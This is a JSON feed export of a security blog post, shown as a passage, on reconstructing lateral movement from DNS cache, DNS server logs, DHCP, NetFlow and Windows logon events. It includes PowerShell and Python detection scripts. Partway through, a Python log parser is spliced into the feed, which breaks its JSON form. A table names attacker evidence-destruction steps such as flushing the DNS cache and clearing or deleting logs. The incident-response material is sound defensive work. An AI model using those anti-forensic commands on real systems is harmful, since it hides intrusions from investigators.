{
    "version": "https://jsonfeed.org/version/1",
    "title": "Inference Defense Blog",
    "home_page_url": "https://inferencedefense.com/academy/blog-internal/",
    "description": "Inference Defense Blog",
    "items": [
        {
            "id": "https://inferencedefense.com/academy/blog-internal/network-forensics-lateral-movement-dns-netflow-auth-logs",
            "content_html": "<blockquote>\n<p><em>The attacker has been in your network for six days. You have no packet capture. You have no IDS tap on east-west traffic. Your NDR license only covers the perimeter. The EDR on the compromised host was disabled on day two. What you do have: DNS server query logs, DHCP lease records, NetFlow from your core switches, and Windows Security event logs from your domain controllers. That is enough, if you know exactly what to look for, in what order, and how to correlate across sources that were never designed to talk to each other.</em></p>\n</blockquote>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"the-forensic-reality-most-ir-teams-face\">The Forensic Reality Most IR Teams Face<a href=\"https://inferencedefense.com/academy/blog-internal/network-forensics-lateral-movement-dns-netflow-auth-logs#the-forensic-reality-most-ir-teams-face\" class=\"hash-link\" aria-label=\"Direct link to The Forensic Reality Most IR Teams Face\" title=\"Direct link to The Forensic Reality Most IR Teams Face\" translate=\"no\">​</a></h2>\n<p>Full packet capture of internal east-west traffic is the gold standard for network forensics. It is also rarely present. The economics don't work for most organizations: a single 10Gbps link at line rate is 1.25GB/s, about 108TB per day, and even at a more realistic 70% average utilization that is roughly 75TB per day per link. The storage, licensing, and operational overhead is prohibitive outside of the largest enterprises.</p>\n<p>What almost every organization does have, often without realizing its forensic value, is a set of indirect network artifacts that, when properly correlated, can reconstruct lateral movement with surprising fidelity. These artifacts are not designed for security. They exist for operational reasons: DHCP assigns IPs, DNS resolves names, NetFlow measures bandwidth, and authentication logs track access control. 
But together they form a network activity record that tells the story of which machine talked to which other machine, when, using which identity, and with what volume of data.</p>\n<p>This post covers:</p>\n<ol>\n<li class=\"\"><strong>DNS cache forensics</strong>: what survives on live endpoints, what the DNS server logs, and how to extract lateral movement indicators from both</li>\n<li class=\"\"><strong>DHCP log correlation</strong>: the IP-to-hostname-to-MAC mapping that is your network identity backbone</li>\n<li class=\"\"><strong>NetFlow analysis</strong>: reading flow records to detect internal scanning, lateral movement, and staged exfiltration</li>\n<li class=\"\"><strong>Windows authentication log correlation</strong>: mapping logon events to network events to build a movement timeline</li>\n<li class=\"\"><strong>Cross-source correlation</strong>: the JOIN operations that turn four incomplete pictures into one complete attack timeline</li>\n</ol>\n<p>Every technique includes exact commands, scripts, and queries you can execute during an active investigation.</p>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"part-1--understanding-what-evidence-each-source-preserves\">Part 1: Understanding What Evidence Each Source Preserves<a href=\"https://inferencedefense.com/academy/blog-internal/network-forensics-lateral-movement-dns-netflow-auth-logs#part-1--understanding-what-evidence-each-source-preserves\" class=\"hash-link\" aria-label=\"Direct link to Part 1: Understanding What Evidence Each Source Preserves\" title=\"Direct link to Part 1: Understanding What Evidence Each Source Preserves\" translate=\"no\">​</a></h2>\n<p>Before diving into the techniques, understand what each source captures, how long it survives, and what attackers do to destroy it. 
This determines your evidence collection priority during the first hour of IR.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"evidence-volatility-matrix\">Evidence Volatility Matrix<a href=\"https://inferencedefense.com/academy/blog-internal/network-forensics-lateral-movement-dns-netflow-auth-logs#evidence-volatility-matrix\" class=\"hash-link\" aria-label=\"Direct link to Evidence Volatility Matrix\" title=\"Direct link to Evidence Volatility Matrix\" translate=\"no\">​</a></h3>\n<table><thead><tr><th>Source</th><th>Where Stored</th><th>Default Retention</th><th>Volatile?</th><th>Attacker Can Destroy?</th></tr></thead><tbody><tr><td>Client DNS cache</td><td>Memory (Windows DNS Client svc)</td><td>Until reboot, flush, or TTL expiry (cached TTLs capped at 1 day)</td><td>Yes (highest on the host)</td><td><code>ipconfig /flushdns</code> or a reboot</td></tr><tr><td>DNS server query logs</td><td>Flat-file debug log, or ETW analytical log (.etl), on the DNS server</td><td>Not collected unless enabled; the debug log wraps at its size limit</td><td>Medium</td><td>Disable logging, overwrite or delete the file</td></tr><tr><td>DHCP server logs</td><td><code>C:\\Windows\\System32\\dhcp\\DhcpSrvLog-*.log</code></td><td>7 daily files, overwritten weekly</td><td>Medium</td><td>Delete log files</td></tr><tr><td>DHCP lease database</td><td><code>C:\\Windows\\System32\\dhcp\\dhcp.mdb</code></td><td>Active leases only</td><td>Low</td><td>Requires DHCP server access</td></tr><tr><td>NetFlow records</td><td>Flow collector appliance/SIEM</td><td>Weeks to months</td><td>Low</td><td>Requires collector access</td></tr><tr><td>Windows auth logs (4624)</td><td>Security.evtx / SIEM</td><td>Per log size / SIEM</td><td>Medium</td><td>Event log clear (leaves event 1102)</td></tr><tr><td>ARP table (router)</td><td>Router memory</td><td>Minutes to hours</td><td>Highest</td><td>Volatile by design</td></tr><tr><td>DNS passive records (SIEM)</td><td>SIEM if collected</td><td>Per SIEM retention</td><td>Low</td><td>Requires SIEM access</td></tr></tbody></table>\n<p><strong>Collection priority:</strong> DNS cache → DHCP DB → Auth logs → NetFlow. 
The first two expire or get destroyed fastest: the lease database only ever holds current leases, so an address that has since been reassigned is already gone from it. Grab router ARP tables at the same time as the DNS cache if you can reach them; they age out in minutes. NetFlow is typically the most durable artifact.</p>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"part-2--dns-cache-forensics\">Part 2: DNS Cache Forensics<a href=\"https://inferencedefense.com/academy/blog-internal/network-forensics-lateral-movement-dns-netflow-auth-logs#part-2--dns-cache-forensics\" class=\"hash-link\" aria-label=\"Direct link to Part 2: DNS Cache Forensics\" title=\"Direct link to Part 2: DNS Cache Forensics\" translate=\"no\">​</a></h2>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"21-the-client-dns-cache-a-map-of-recent-activity\">2.1 The Client DNS Cache: A Map of Recent Activity<a href=\"https://inferencedefense.com/academy/blog-internal/network-forensics-lateral-movement-dns-netflow-auth-logs#21-the-client-dns-cache-a-map-of-recent-activity\" class=\"hash-link\" aria-label=\"Direct link to 2.1 The Client DNS Cache: A Map of Recent Activity\" title=\"Direct link to 2.1 The Client DNS Cache: A Map of Recent Activity\" translate=\"no\">​</a></h3>\n<p>Every Windows host maintains a local DNS resolver cache: an in-memory table of recently resolved hostnames and their IP addresses, negative answers included. The cache is populated every time the resolver answers a name lookup on the host's behalf, so any process that connected to another machine by name leaves an entry. For lateral movement forensics, this is invaluable: <strong>it records the internal hostnames the compromised machine tried to reach</strong>, even when the connection itself left no other trace. The limit is time: an entry lives until its TTL expires (the DNS Client caps cached TTLs at one day by default), so the cache shows recent activity, not the whole intrusion.</p>\n<p>The cache is managed by the DNS Client service (svchost.exe hosting <code>Dnscache</code>). It does not survive a reboot: on restart it is rebuilt from the hosts file and from new resolutions, so rebooting the suspect host destroys this evidence as surely as <code>ipconfig /flushdns</code>. Collect it before any containment step that restarts the machine.</p>\n<p><strong>Live extraction from a running host:</strong></p>\n<div class=\"language-cmd codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-cmd codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Basic extraction: all cached entries</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">ipconfig /displaydns</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Output format for a single entry (no timestamp is kept; only the remaining TTL hints at age):</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">::     Record Name . . . . . : DC02.corp.local</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">::     Record Type . . . . . : 1          &lt;- A record (IPv4)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">::     Time To Live  . . . . : 1847       &lt;- seconds remaining before expiry</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">::     Data Length . . . . . : 4</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">::     Section . . . . . . . : Answer</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">::     A (Host) Record . . . : 10.10.1.15</span><br></span></code></pre></div></div>\n<p><strong>Structured extraction for analysis:</strong></p>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Extract DNS cache as structured objects: far more useful than raw ipconfig output</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Run on suspect host or via Invoke-Command for remote collection</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$dnsCache = Get-DnsClientCache | Select-Object `</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Entry,          # The queried hostname</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    RecordName,     # Actual DNS record name (may differ: CNAME targets)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    RecordType,     # 1=A, 28=AAAA, 5=CNAME, 12=PTR, 15=MX</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Status,         # Success, NotExist, etc.</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Section,        # Answer, Authority, Additional</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    TimeToLive,     # Remaining TTL in seconds (no insertion time is stored; a TTL far below the zone's TTL means an older entry)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    DataLength,</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Data            # The resolved IP address</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Filter for internal (RFC 1918) ranges, anchored to the start of the address: lateral movement candidates</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$internalRanges = @('^10\\.', '^172\\.(1[6-9]|2\\d|3[01])\\.', '^192\\.168\\.')</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$lateralCandidates = $dnsCache | Where-Object {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    $ip = $_.Data</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    $isInternal = $internalRanges | Where-Object { $ip -match $_ }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    $isInternal -and $_.RecordType -eq 1  # A records only</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">}</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span 
class=\"token plain\">$lateralCandidates | Sort-Object Entry | Format-Table -AutoSize</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Export for comparison across multiple hosts</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$lateralCandidates | Export-Csv \"dns_cache_$(hostname)_$(Get-Date -Format 'yyyyMMddHHmm').csv\" -NoTypeInformation</span><br></span></code></pre></div></div>\n<p><strong>Remote collection across all suspect hosts:</strong></p>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Bulk DNS cache collection: run from the IR workstation with admin rights</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Caveat: Invoke-Command logs on to each host over WinRM (a 4624 logon type 3 plus WSMan activity),</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># so record the collection time and exclude your own sessions when you build the timeline later</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$suspectHosts = @(\"WORKSTATION01\", \"WORKSTATION02\", \"SERVER01\")</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$allCacheEntries = @()</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">foreach ($computer in $suspectHosts) {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    try {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        $entries = Invoke-Command -ComputerName $computer -ScriptBlock {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            Get-DnsClientCache | Select-Object Entry, RecordType, TimeToLive, Data,</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                @{N='SourceHost'; E={$env:COMPUTERNAME}}</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        } -ErrorAction Stop</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        $allCacheEntries += $entries</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        Write-Host \"[+] Collected from $computer : $($entries.Count) entries\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    } catch {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        Write-Warning \"[-] Failed on $computer : $_\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">}</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Find hosts that cached the same internal target: a lateral movement breadcrumb.</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Expect DCs, file and update servers here; the interesting hits are targets ordinary clients have no reason to resolve</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$allCacheEntries |</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Where-Object { $_.Data -match '^(10\\.|172\\.(1[6-9]|2\\d|3[01])\\.|192\\.168\\.)' -and $_.RecordType -eq 1 } |</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Group-Object Data |</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Where-Object { @($_.Group.SourceHost | Sort-Object -Unique).Count -gt 1 } |  # same IP cached on more than one host, not just on several rows</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    ForEach-Object {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        Write-Host \"Shared target: $($_.Name)\" -ForegroundColor Yellow</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        $_.Group | Select-Object SourceHost, Entry, TimeToLive | Format-Table</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    }</span><br></span></code></pre></div></div>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"22-what-the-dns-cache-reveals-about-attack-techniques\">2.2 What the DNS Cache Reveals About Attack Techniques<a href=\"https://inferencedefense.com/academy/blog-internal/network-forensics-lateral-movement-dns-netflow-auth-logs#22-what-the-dns-cache-reveals-about-attack-techniques\" class=\"hash-link\" aria-label=\"Direct link to 2.2 What the DNS Cache Reveals About Attack Techniques\" title=\"Direct link to 2.2 What the DNS Cache Reveals About Attack Techniques\" translate=\"no\">​</a></h3>\n<p>Different lateral movement techniques leave distinct DNS cache signatures:</p>\n<p><strong>BloodHound collection is particularly distinctive in DNS cache:</strong></p>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 
16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Detect a BloodHound/SharpHound-style mass internal resolution burst in the DNS cache</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Key indicator: &gt;50 unique internal hosts resolved in a single cache snapshot of a workstation</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Baseline by role first: DCs, monitoring and management servers legitimately resolve hundreds of internal names</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$internalEntries = Get-DnsClientCache |</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Where-Object { $_.Data -match '^(10\\.|172\\.(1[6-9]|2\\d|3[01])\\.|192\\.168\\.)' -and $_.RecordType -eq 1 }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Count distinct target addresses, not cache rows: several names can resolve to one host</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$uniqueHosts = @($internalEntries.Data | Sort-Object -Unique).Count</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Group by /24 to see the spread pattern (@() keeps .Count meaningful when only one subnet is present)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$subnetSpread = @($internalEntries | ForEach-Object {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    $octets = $_.Data.Split('.')</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    \"$($octets[0]).$($octets[1]).$($octets[2]).0/24\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">} | Group-Object | Sort-Object Count -Descending)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Write-Host \"Unique subnets contacted: $($subnetSpread.Count)\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Write-Host \"Unique internal hosts resolved: $uniqueHosts\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">if ($uniqueHosts -gt 50) {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Write-Warning \"INDICATOR: High internal hostname resolution count: possible AD enumeration\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">}</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">if ($subnetSpread.Count -gt 5) {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Write-Warning \"INDICATOR: Resolutions span &gt;5 subnets: possible network discovery\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">}</span><br></span></code></pre></div></div>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"23-dns-server-query-logs-the-persistent-record\">2.3 DNS Server Query Logs: The Persistent Record<a href=\"https://inferencedefense.com/academy/blog-internal/network-forensics-lateral-movement-dns-netflow-auth-logs#23-dns-server-query-logs-the-persistent-record\" class=\"hash-link\" aria-label=\"Direct link to 2.3 DNS Server Query Logs: The Persistent Record\" title=\"Direct link to 2.3 DNS Server Query Logs: The Persistent Record\" translate=\"no\">​</a></h3>\n<p>The client cache is volatile. The DNS server query log is persistent, provided it is enabled. 
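</p>
<p>Before looking at how to switch the log on, here is how it is read back once it exists. The parser below is an added example written for this edit, not code from the original post. It splits each line on whitespace rather than trusting one regex, reads the <code>R</code> column that separates a query from its response, decodes the length-prefixed question name (<code>(6)TARGET(4)corp(5)local(0)</code> becomes <code>target.corp.local</code>), and then applies the burst heuristic from section 2.2 to server-side records, where real timestamps make the window explicit: for each client, the largest number of distinct names under a zone resolved inside any sliding 60-second window. The log lines, the <code>corp.local</code> zone and the <code>10.10.x.x</code> clients are constructed for the example, and the timestamp layouts are an assumption about the server locale.</p>

```python
# Added example for this edit, not code from the original post. Parses the
# Windows DNS Server debug log summary line (one line per packet, -Details off)
# and flags per-client discovery bursts. SAMPLE_LOG, the corp.local zone and
# the 10.10.x.x client addresses are constructed for the example.
from collections import defaultdict
from datetime import datetime, timedelta
from ipaddress import ip_address

# Timestamp layouts tried in order (an assumption: the server writes its locale format).
TIME_FORMATS = ('%m/%d/%Y %I:%M:%S %p', '%Y-%m-%d %H:%M:%S', '%d.%m.%Y %H:%M:%S')

# Constructed sample. Columns: Date Time Thread Context PacketID Proto Snd/Rcv
# RemoteIP Xid [R] Opcode [FlagsHex FlagChars RCODE] QType QName.
# 10.10.5.42 walks through internal names within seconds; 10.10.7.9 is normal.
SAMPLE_LOG = '''
DNS Server log file creation at 11/15/2025 12:00:01 AM
11/15/2025 2:47:33 AM 0D4C PACKET  000000AA3F012345 UDP Rcv 10.10.5.42   6d43   Q [0001   D   NOERROR] A      (6)TARGET(4)corp(5)local(0)
11/15/2025 2:47:33 AM 0D4C PACKET  000000AA3F012345 UDP Snd 10.10.5.42   6d43 R Q [8081   DR  NOERROR] A      (6)TARGET(4)corp(5)local(0)
11/15/2025 2:47:34 AM 0D4C PACKET  000000AA3F012346 UDP Rcv 10.10.5.42   6d44   Q [0001   D   NOERROR] A      (4)FS01(4)corp(5)local(0)
11/15/2025 2:47:34 AM 0D4C PACKET  000000AA3F012347 UDP Rcv 10.10.5.42   6d45   Q [0001   D   NOERROR] A      (4)FS02(4)corp(5)local(0)
11/15/2025 2:47:35 AM 0D4C PACKET  000000AA3F012348 UDP Rcv 10.10.5.42   6d46   Q [0001   D   NOERROR] A      (4)SQL9(4)corp(5)local(0)
11/15/2025 2:47:35 AM 0D4C PACKET  000000AA3F012348 UDP Snd 10.10.5.42   6d46 R Q [8083   DR  NXDOMAIN] A      (4)SQL9(4)corp(5)local(0)
11/15/2025 2:47:36 AM 0D4C PACKET  000000AA3F012349 UDP Rcv 10.10.5.42   6d47   Q [0001   D   NOERROR] A      (4)DC02(4)corp(5)local(0)
11/15/2025 3:10:02 AM 0D4C PACKET  000000AA3F01234A UDP Rcv 10.10.7.9    1a2b   Q [0001   D   NOERROR] A      (4)DC02(4)corp(5)local(0)
11/15/2025 3:10:02 AM 0D4C PACKET  000000AA3F01234B UDP Rcv 10.10.7.9    1a2c   Q [0001   D   NOERROR] A      (3)www(7)example(3)com(0)
'''

def decode_name(wire):
    # '(6)TARGET(4)corp(5)local(0)' -> 'target.corp.local'; the root '(0)' alone -> '.'
    labels = []
    for chunk in wire.split('(')[1:]:
        count, _, label = chunk.partition(')')
        if count != '0' and label:
            labels.append(label)
    return '.'.join(labels).lower() or '.'

def parse_timestamp(text):
    for fmt in TIME_FORMATS:
        try:
            return datetime.strptime(text, fmt)
        except ValueError:
            pass
    return None

def parse_line(line):
    # One packet line -> dict; headers, blanks and truncated lines -> None.
    parts = line.split()
    if 'PACKET' not in parts:
        return None
    i = parts.index('PACKET')
    stamp = parse_timestamp(' '.join(parts[:i - 1]))   # everything before the thread id
    try:
        client, xid = parts[i + 4:i + 6]
        is_response = parts[i + 6] == 'R'              # the R column is blank for a query
        j = i + 8 if is_response else i + 7            # past the R column and the opcode
        if not parts[j].startswith('['):
            return None
        k = j
        while not parts[k].endswith(']'):              # flag chars in between may be absent
            k += 1
        qtype, qname = parts[k + 1], parts[k + 2]
    except (ValueError, IndexError):
        return None
    if stamp is None:
        return None
    return {'time': stamp, 'client': client, 'xid': xid, 'response': is_response,
            'rcode': parts[k].rstrip(']'), 'qtype': qtype, 'qname': decode_name(qname)}

def parse_log(text):
    # For a real file: parse_log(open(path, errors='replace').read())
    return [r for r in map(parse_line, text.splitlines()) if r]

def discovery_bursts(records, zone, window=timedelta(seconds=60), threshold=50):
    # Per internal client: the most distinct names under zone queried inside any window.
    # Returns {client: (distinct_names, window_start)} for clients at or above threshold.
    per_client = defaultdict(list)
    for r in records:
        if r['response'] or not r['qname'].endswith(zone) or not ip_address(r['client']).is_private:
            continue
        per_client[r['client']].append((r['time'], r['qname']))
    flagged = {}
    for client, events in per_client.items():
        events.sort()
        left, best = 0, (0, None)
        for idx, (t, _) in enumerate(events):
            while t - events[left][0] > window:   # drop events that fell out of the window
                left += 1
            distinct = len({n for _, n in events[left:idx + 1]})
            if distinct > best[0]:
                best = (distinct, events[left][0])
        if best[0] >= threshold:
            flagged[client] = best
    return flagged

if __name__ == '__main__':
    recs = parse_log(SAMPLE_LOG)
    for client, (n, start) in discovery_bursts(recs, '.corp.local', threshold=5).items():
        print(f'{client}: {n} distinct corp.local names within 60s from {start}')
```

<p>Run as-is it flags <code>10.10.5.42</code> with five distinct <code>corp.local</code> names in three seconds. On a real log, feed the file contents to <code>parse_log</code>, raise <code>threshold</code> towards the &gt;50 figure used for workstations above after baselining the servers that legitimately resolve many names, and use the <code>rcode</code> field to count NXDOMAIN answers per client, since name guessing leaves those behind.</p>
<p>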
Microsoft DNS Server on Windows Server can log all DNS queries received, but this is <strong>disabled by default</strong> and must be enabled explicitly. Two mechanisms exist: the classic debug log (a flat text file, one line per packet, which is what this section parses) and the ETW analytical log (<code>Microsoft-Windows-DNSServer/Analytical</code>, written as .etl). Either way, nothing exists for the days before you turned it on, which is why it belongs in the baseline logging configuration rather than the IR playbook.</p>\n<p><strong>Enable DNS debug logging (Windows DNS Server):</strong></p>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Enable DNS debug logging: captures all queries to a flat file</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Run on the DNS server (typically a DC); needs the DnsServer PowerShell module</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 